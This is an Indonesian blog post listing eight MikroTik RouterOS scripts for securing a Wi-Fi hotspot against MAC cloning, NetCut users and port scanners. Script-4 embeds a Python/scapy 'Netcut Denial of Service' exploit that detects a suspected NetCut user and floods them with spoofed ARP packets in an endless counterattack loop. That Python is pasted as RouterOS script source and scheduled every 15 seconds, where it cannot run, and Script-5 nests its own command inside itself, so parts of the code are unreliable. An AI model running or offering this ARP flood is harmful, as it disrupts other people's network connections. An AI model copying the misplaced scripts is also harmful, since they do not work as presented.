Kamis, 21 September 2023

Delapan Script Pengaman Mikrotik dari 'Orang Usil' & Pencari WiFi Gratisan

[Cara efektif untuk mengamankan Mikrotik dari 'Pencari sinyal WiFi Gratisan'. Mengapa pada LOG Mikrotik saya sering muncul pesan berwarna merah : login failure for user root from 10.10.10.10 via telnet ? Apakah aman menggunakan mikrotik untuk membuat hostpot di kantor saya ?]


Menggunakan mikrotik untuk manajemen User & Akses Internet bagi tempat usaha kita seperti Small Office Home Office, Kos-kosan, Motel, dll. Salah satu fitur yang diberikan mikrotik adalah 'memaksa' pengguna Internet kita untuk Login terlebih dahulu pada sebuah Login Page. Terbukanya jaringan Wi-Fi yang tersedia, terlebih yang dipancarkan sebuah Akses Point yang memiliki kekuatan besar, bisa memancing orang-orang 'Usil' untuk membuka password Wi-Fi atau bahkan Mikrotik yang telah kita setting.

Kalau kita buka Log di Mikrotik akan nampak pesan-pesan berwarna merah, terkadang pada waktu dan jam-jam tertentu, seperti gambar di atas. Berikut delapan script yang menurut pengalaman kami, saat ini bisa mengamankan mikrotik dari kejahilan orang-orang usil dalam cakupan sinyal yang disebarkan oleh Akses Point yang kita miliki.


Script-1: Un-Clonning MAC ADDRESS

 [Ganti dengan alamat e-mail yan anda miliki]

# Get user data information

local a $user;

local b $"mac-address";

local c $address;

local e [/ip dhcp-server lease get [find mac-address="$b"] host-name];

# User ip block if the host name is different

if ([len [/ip hotspot user get [find name="$a"] email]] = 0) do={[

/ip hotspot user set [find name="$a"] email="$e-jongjava777@gmail.com"

]} else={[

if ([/ip hotspot user get [find name="$a"] email]  != "$e-jongjava777@gmail.com") do={[/ip firewall address-list add address="$c" list="BlockUser" comment="Maling-MacAddress" timeout="00:02:00";

/system scheduler add name="$a-block" interval="00:02:00" on-event="if ([len [/ip hotspot active find mac-address=$b]] = 1) do={[/ip hotspot active remove [find mac-address=$b]]};

if ([len [/ip hotspot host find mac-address=$b]] = 1) do={[/ip hotspot host remove [find mac-address=$b]]};

if ([len [/ip hotspot cookie find mac-address=$b]] = 1) do={[/ip hotspot cookie remove [find mac-address=$b]]};

/system scheduler remove [find name=$a-block]"]}

]}

 

Script-2: Anti NetCut


/system script

add name=antinetcut1 policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    source=":local hosts [/ip dhcp-server lease find]\r\

    \n:local pcname \"\"\r\

    \n:local pcnum 0\r\

    \n:global hacklist \"\"\r\

    \n# To log the value of \$hacklist each hour, make debug 1 (if \$hacklist is\

    \_blank, nothing will be logged)\r\

    \n:local debug 1\r\

    \n\r\

    \n:foreach h1 in=\$hosts do={\r\

    \n:local host [/ip dhcp-server lease get \$h1 host-name] \r\

    \n:if ([:len \$host] >0) do {\r\

    \n:set pcname (\$pcname . \",\" . \$host)\r\

    \n:set pcnum (\$pcnum + 1)\r\

    \n}\r\

    \n}\r\

    \n\r\

    \n:local pcnameArr [:toarray \$pcname];\r\

    \n\r\

    \n:foreach h2 in=\$pcnameArr do={\r\

    \n:local hh 0\r\

    \n:if (!([:find \$hacklist \$h2]>=0)) do={\r\

    \n:foreach k in=\$pcnameArr do={ :if (\$k=\$h2) do={:set hh (\$hh + 1) } }\r\

    \n:if (\$hh>2) do={ \r\

    \n:if ([:len \$hacklist] >0) do {:set hacklist (\$hacklist . \",\" . \$h2)} \

    else={:set hacklist \$h2}\r\

    \n}\r\

    \n}\r\

    \n}\r\

    \n\r\

    \n# monitor results in logfile once an hour \r\

    \n:local timer [:pick [/system clock get time] 3 5]\r\

    \n:if ((\$debug > 0) || (\$timer >= \"58\")) do={ \r\

    \n:if ([:len \$hacklist] >0) do={\r\

    \n:log warning (\"New Hacklist: \" . \$hacklist)\r\

    \n}\r\

    \n}\r\

    \n"

add name=antinetcut2 policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    source=":local host\r\

    \n:local ipnum\r\

    \n:local unum\r\

    \n:local usr\r\

    \n:local i\r\

    \n:global hacklist\r\

    \n\r\

    \n:foreach host in=\$hacklist do={\r\

    \n:foreach i in= [/ip dhcp-server lease find host-name=\$host] do={\r\

    \n:set ipnum [/ip dhcp-server lease get \$i address]\r\

    \n:set unum [/ip hotspot active find address=\$ipnum]\r\

    \n:if ([:len \$unum] >0) do {\r\

    \n:set usr [/ip hotspot active get \$unum user]\r\

    \n:log warning (\$host . \" \" . \$ipnum . \" \" . \$usr)\r\

    \n/ip hotspot active remove \$unum\r\

    \n}\r\

    \n}\r\

    \n}\r\

    \n"

add name=antinetcut3 policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    source=":local hosts [:toarray \"comp1,comp2\"]\r\

    \n:local host;\r\

    \n:local ipnum;\r\

    \n:local unum;\r\

    \n:local usr;\r\

    \n:local i;\r\

    \n\r\

    \n:foreach host in=\$hosts do={\r\

    \n   :foreach i in= [/ip dhcp-server lease find host-name=\$host] do={\r\

    \n      :set ipnum [/ip dhcp-server lease get \$i address];\r\

    \n      :set unum [/ip hotspot active find address=\$ipnum];\r\

    \n      :set usr [/ip hotspot active get \$unum user];\r\

    \n      :log warning (\$host . \" \" . \$ipnum . \" \" . \$usr);\r\

    \n      /ip hotspot active remove \$unum\r\

    \n      /ip dhcp-server lease remove [/ip dhcp-server lease find host-name=\

    \$host]\r\

    \n   }\r\

    \n}\r\

    \n:\r\

    \n"

 

Script-3 : Flush DNS

/system script

add name=cacheflush policy=ftp,reboot,read,write,policy,test,winbox,password \

    source="/ip dns cache flush"

 

Artikel terkait :

Memindahkan data User List & User Profiles Hotspot ke Mikrotik Baru

Script-4 : NetCut KILLER

/system script

add name=phyton-anti-net-cut policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    source="#!/usr/bin/env python\r\

    \n#Exploit Title: Netcut Denial of Service Vulnerability\r\

    \55:33 Network\r\  \n#Blog: https://variouslight.blogspot.com\r\

    \n#PoC: Video  https://youtube.com/channel/UCuF5rIPZecm0HLkXuwydABw\r\

    \n#     Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAx\

    s/wSGL1tKGflc/s1600/a.png\r\

    \n#Version: Netcut 2\r\

    \n#Software Link: http://www.mediafire.com/\?jiiyq2wcpp41266\r\

    \n#Tested on: Windows Xp, Windows 7\r\

    \n#Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, S\

    umedt, Rocky Sharma\r\

    \n \r\

    \nfrom scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf\r\

    \nimport commands,os,sys\r\

    \n \r\

    \n#gw_mac = commands.getoutput(\"arp -i %s | grep %s\" % (conf.iface,conf.if\

    ace)).split()[2]\r\

    \ngw_ip  = commands.getoutput(\"ip route list | grep default\").split()[2]\r\

    \n     \r\

    \ndef protect(gw_ip,gw_mac):\r\

    \n    os.popen(\"arp -s %s %s\" %(gw_ip,gw_mac))\r\

    \n    print \"Protected himself\"\r\

    \n     \r\

    \ndef detect():\r\

    \n        ans = sniff(filter='arp',timeout=7)\r\

    \n        target=[]\r\

    \n        for r in ans.res:\r\

    \n            target.append(r.sprintf(\"%ARP.pdst% %ARP.hwsrc% %ARP.psrc%\")\

    ) \r\

    \n        return target\r\

    \n \r\

    \ndef preattack(gw_ip):\r\

    \n    num = []\r\

    \n    count = 0\r\

    \n    target = 0\r\

    \n    temp = 0\r\

    \n    print \"Detecting...\"\r\

    \n    d = detect()\r\

    \n    for i in range(len(d)):\r\

    \n        if d[i].split()[0] == \"255.255.255.255\":\r\

    \n            num.append(d.count(d[i])) \r\

    \n            if d.count(d[i]) > count:\r\

    \n                count = d.count(d[i])\r\

    \n                target = i\r\

    \n        if d[i].split()[0] == gw_ip:\r\

    \n            temp += 1      \r\

    \n    if len(d) < 7:\r\

    \n        print \"[-] No one use Netcut or try again\"\r\

    \n        exit()\r\

    \n    if len(num)*7 < temp:\r\

    \n        num[:] = []\r\

    \n        count = 0\r\

    \n        result = float(temp)/len(d)*100\r\

    \n        for j in range(len(d)):\r\

    \n            if d[i].split()[0] == gw_ip:\r\

    \n                num.append(d.count(d[j]))\r\

    \n                if d.count(d[i]) > count:\r\

    \n                    count = d.count(d[i])\r\

    \n                    target = i\r\

    \n            num.reverse()\r\

    \n            result = float(temp)/len(d)*100\r\

    \n        print target \r\

    \n    else:\r\

    \n        num.reverse()\r\

    \n        result = float(num[0]+temp)/len(d)*100\r\

    \n     \r\

    \n    print \"There is a possibility that \" + str(result) + \"%\"\r\

    \n    if result>= 50:\r\

    \n        target_mac = d[target].split()[1]\r\

    \n        target_ip = d[target].split()[2]\r\

    \n        print \"[+]Detected, Netcut using by IP %s MAC %s\" %(target_ip,ta\

    rget_mac)\r\

    \n        attack(target_mac,target_ip,gw_ip)    \r\

    \n    else:\r\

    \n        print \"[-] No one use Netcut or try again\"\r\

    \n \r\

    \ndef attack(target_mac,target_ip,gw_ip):\r\

    \n    print \"[+]Counter Attack !!!\"\r\

    \n    e = Ether(dst=\"FF:FF:FF:FF:FF:FF\")\r\

    \n    while 1:\r\

    \n        a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(\

    ),op=1)\r\

    \n        p = e/a/Padding(\"\\x00\"*18)\r\

    \n        sendp(p,verbose=0)\r\

    \n        a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_ma\

    c,op=2)\r\

    \n        p1 = e/a1/Padding(\"\\x00\"*18)\r\

    \n        sendp(p1,verbose=0)\r\

    \n         \r\

    \nif __name__ == '__main__':\r\

    \n    os.system(\"clear\")\r\

    \n    print   \"###################################################\"\r\

    \n    print    \" __  __    __     __    _____   __      __  _   _\"\r\

    \n    print    \"|  \\/  |   \\ \\   / /   / ____|  \\ \\    / / | \\ | |\"\

    \r\

    \n    print    \"| \\  / | __ \\ \\_/ /_ _| (___   __\\ \\  / /__|  \\| |\"\

    \r\

    \n    print    \"| |\\/| |/ _\\ \\   / _\\ |\\___ \\ / _ \\ \\/ / _ \\ . \\ \

    |\"\r\

    \n    print    \"| |  | | (_| || | (_| |____) |  __/\\  /  __/ |\\  |\"\r\

    \n    print    \"|_|  |_|\\__,_||_|\\__,_|_____/ \\___| \\/ \\___|_| \\_|\"\

    \r\

    \n    print   \" \"\r\

    \n    print   \"###################################################\"\r\

    \n    print   \"\"\r\

    \n    print   \"https://variouslight.blogspot.com\"\r\

    \n    print   \"\"\r\

    \n    if len(sys.argv) == 2 or len(sys.argv) == 3:\r\

    \n        if len(sys.argv) == 2:\r\

    \n            conf.iface=sys.argv[1]\r\

    \n            preattack(gw_ip)\r\

    \n        if len(sys.argv) == 3:\r\

    \n            conf.iface=sys.argv[1]\r\

    \n            gw_mac = sys.argv[2]\r\

    \n            protect(gw_ip,gw_mac)\r\

    \n            preattack(gw_ip)\r\

    \n    else:\r\

    \n        print '''Mode:   \r\

    \n1.)Attack only\r\

    \nUsage: NetcutKiller <Interface>\r\

    \ne.g. NetcutKiller.py wlan0\r\

    \n         \r\

    \n2.)Attack with protect himself\r\

    \nUsage: NetcutKiller <Interface> <MAC_Gateway> \r\

    \ne.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF \r\

    \n'''"

 

Artikel terkait :
Cara Kirim file Back-up Mikrotik secara Otomatis via e-Mail

Script-5 : Clear Connection

 

/system script

add name=clear-connections policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    source="add name=clear-connections policy=ftp,reboot,read,write,policy,test,\

    winbox,password,sniff,sensitive,api source=\":log info message=\\\"clearing \

    connections begin\\\r\

    \n    \\\"\\r\\\r\

    \n    \\n:foreach i in=[/ip firewall connection find] do={/ip firewall conne\

    ction remove \\\$i}\\r\\\r\

    \n    \\n:log info message=\\\"clearing connections end\\\"\\r\\\r\

    \n    \\n\"\r\

    \n"

 

 

Script-6 : Anti Spofing

 

/system script

add name=ip-spoofing policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    source=":local interfacesubnet [/ip address get [/ip\r\

    \naddress find where interface=bridge1-HOTSPOT]\r\

    \naddress]; /ip firewall address-list add\r\

    \naddress=\$interfacesubnet list=ipv4-ether1-gateway-\r\

    \ninterfacesubnet"

 

Script-7 : Anti MAC Clone Schedule

[Setting terlebih dahulu System > SNTP Client di mikrotik Anda]

/system scheduler

add disabled=no interval=15s name=anti-mac-clone on-event=":local hosts [/ip dhc\

    p-server lease find]\r\

    \n:local pcname \"\"\r\

    \n:local pcnum 0\r\

    \n:global hacklist \"\"\r\

    \n# To log the value of \$hacklist each hour, make debug 1 (if \$hacklist is\

    \_blank, nothing will be logged)\r\

    \n:local debug 1\r\

    \n\r\

    \n:foreach h1 in=\$hosts do={\r\

    \n:local host [/ip dhcp-server lease get \$h1 host-name] \r\

    \n:if ([:len \$host] >0) do {\r\

    \n:set pcname (\$pcname . \",\" . \$host)\r\

    \n:set pcnum (\$pcnum + 1)\r\

    \n}\r\

    \n}\r\

    \n\r\

    \n:local pcnameArr [:toarray \$pcname];\r\

    \n\r\

    \n:foreach h2 in=\$pcnameArr do={\r\

    \n:local hh 0\r\

    \n:if (!([:find \$hacklist \$h2]>=0)) do={\r\

    \n:foreach k in=\$pcnameArr do={ :if (\$k=\$h2) do={:set hh (\$hh + 1) } }\r\

    \n:if (\$hh>2) do={ \r\

    \n:if ([:len \$hacklist] >0) do {:set hacklist (\$hacklist . \",\" . \$h2)} \

    else={:set hacklist \$h2}\r\

    \n}\r\

    \n}\r\

    \n}\r\

    \n\r\

    \n# monitor results in logfile once an hour \r\

    \n:local timer [:pick [/system clock get time] 3 5]\r\

    \n:if ((\$debug > 0) || (\$timer >= \"58\")) do={ \r\

    \n:if ([:len \$hacklist] >0) do={\r\

    \n:log warning (\"New Hacklist: \" . \$hacklist)\r\

    \n}\r\

    \n}\r\

    \n" policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    start-date=mar/22/2023 start-time=00:00:01

add disabled=no interval=6h name=cacheflush on-event=cacheflush policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    start-date=mar/22/2023 start-time=23:59:59

add disabled=no interval=12h name=clear-connections on-event=clear-connections \

    policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    start-date=mar/22/2023 start-time=23:00:00

add disabled=no interval=15s name=antinetcut1 on-event=antinetcut1 policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    start-date=mar/22/2023 start-time=00:00:02

add disabled=no interval=15s name=antinetcut2 on-event=antinetcut2 policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    start-date=mar/22/2023 start-time=00:00:03

add disabled=no interval=15s name=antinetcut3 on-event=antinetcut3 policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    start-date=mar/22/2023 start-time=00:00:04

add disabled=no interval=15s name=phyton-anti-net-cut on-event=\

    phyton-anti-net-cut policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    start-date=mar/22/2023 start-time=00:00:06

add disabled=no interval=15s name=ip-spoofing on-event=ip-spoofing policy=\

    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \

    start-date=mar/22/2023 start-time=00:00:05

 

Script-8 : Router Protection


/ip firewall filter

add action=reject chain=forward comment="1>Block Bogus IP Address" disabled=no \

    reject-with=icmp-network-unreachable src-address=0.0.0.0/8

add action=reject chain=forward disabled=no dst-address=0.0.0.0/8 reject-with=\

    icmp-network-unreachable

add action=reject chain=forward disabled=no reject-with=\

    icmp-network-unreachable src-address=127.0.0.0/8

add action=reject chain=forward disabled=no dst-address=127.0.0.0/8 \

    reject-with=icmp-network-unreachable

add action=reject chain=forward disabled=no reject-with=\

    icmp-network-unreachable src-address=224.0.0.0/3

add action=reject chain=forward disabled=no dst-address=224.0.0.0/3 \

    reject-with=icmp-network-unreachable

add action=reject chain=forward disabled=no reject-with=\

    icmp-network-unreachable src-address=239.0.0.0/8

add action=reject chain=forward disabled=no dst-address=239.0.0.0/8 \

    reject-with=icmp-network-unreachable

add action=drop chain=input comment="2>Drop SSH brute forcers" disabled=no \

    dst-port=22 protocol=tcp src-address-list=ssh_blacklist

add action=add-src-to-address-list address-list=ssh_blacklist \

    address-list-timeout=1w3d chain=input connection-state=new disabled=no \

    dst-port=22 protocol=tcp src-address-list=ssh_stage3

add action=add-src-to-address-list address-list=ssh_stage3 \

    address-list-timeout=1m chain=input connection-state=new disabled=no \

    dst-port=22 protocol=tcp src-address-list=ssh_stage2

add action=add-src-to-address-list address-list=ssh_stage2 \

    address-list-timeout=1m chain=input connection-state=new disabled=no \

    dst-port=22 protocol=tcp src-address-list=ssh_stage1

add action=add-src-to-address-list address-list=ssh_stage1 \

    address-list-timeout=1m chain=input connection-state=new disabled=no \

    dst-port=22 protocol=tcp

add action=add-src-to-address-list address-list="port scanners" \

    address-list-timeout=2w chain=input comment="3>Port Scanners to list" \

    disabled=no protocol=tcp psd=21,3s,3,1

add action=add-src-to-address-list address-list="port scanners" \

    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\

    fin,!syn,!rst,!psh,!ack,!urg

add action=add-src-to-address-list address-list="port scanners" \

    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\

    fin,syn

add action=add-src-to-address-list address-list="port scanners" \

    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\

    syn,rst

add action=add-src-to-address-list address-list="port scanners" \

    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\

    fin,psh,urg,!syn,!rst,!ack

add action=add-src-to-address-list address-list="port scanners" \

    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\

    fin,syn,rst,psh,ack,urg

add action=add-src-to-address-list address-list="port scanners" \

    address-list-timeout=2w chain=input disabled=no protocol=tcp tcp-flags=\

    !fin,!syn,!rst,!psh,!ack,!urg

add action=drop chain=input disabled=no src-address-list="port scanners"

add action=drop chain=input comment="4>Filter FTP to Box" disabled=no dst-port=\

    21 protocol=tcp src-address-list=ftp_blacklist

add action=accept chain=output content="530 Login incorrect" disabled=no \

    dst-limit=1/1m,9,dst-address/1m protocol=tcp

add action=add-dst-to-address-list address-list=ftp_blacklist \

    address-list-timeout=3h chain=output content="530 Login incorrect" \

    disabled=no protocol=tcp

add action=reject chain=udp comment="5>Blocking UDP Packet" disabled=no \

    dst-port=69 protocol=udp reject-with=icmp-network-unreachable

add action=reject chain=udp disabled=no dst-port=111 protocol=udp reject-with=\

    icmp-network-unreachable

add action=reject chain=udp disabled=no dst-port=135 protocol=udp reject-with=\

    icmp-network-unreachable

add action=reject chain=udp disabled=no dst-port=137-139 protocol=udp \

    reject-with=icmp-protocol-unreachable

add action=reject chain=udp disabled=no dst-port=2049 protocol=udp reject-with=\

    icmp-network-unreachable

add action=reject chain=udp disabled=no dst-port=3133 protocol=udp reject-with=\

    icmp-network-unreachable

add action=reject chain=udp disabled=no dst-port=5355 protocol=udp reject-with=\

    icmp-protocol-unreachable

add action=drop chain=tcp comment="6>Bloking TCP Packet" disabled=no dst-port=\

    69 protocol=tcp

add action=drop chain=tcp disabled=no dst-port=111 protocol=tcp

add action=drop chain=tcp disabled=no dst-port=119 protocol=tcp

add action=drop chain=tcp disabled=no dst-port=135 protocol=tcp

add action=drop chain=tcp disabled=no dst-port=137-139 protocol=tcp

add action=drop chain=tcp disabled=no dst-port=445 protocol=tcp

add action=drop chain=tcp disabled=no dst-port=2049 protocol=tcp

add action=drop chain=tcp disabled=no dst-port=12345-12346 protocol=tcp

add action=drop chain=tcp disabled=no dst-port=20034 protocol=tcp

add action=drop chain=tcp disabled=no dst-port=3133 protocol=tcp

add action=drop chain=tcp disabled=no dst-port=67-68 protocol=tcp

 

 


Artikel terkait :
Setting Mikrotik ketika IP Address ISP berubah

Silahkan copy & paste kan ke mikrotik Anda, cek di System > Script List & Scheduler sebagaimana gambar di bawah :


Selamat mencoba, semoga bermanfaat.


Change to WEB Version, please use the Google Translate facility that we have provided, for those of you who do not understand Indonesian. All posts on this blog are merely suggestions and input to you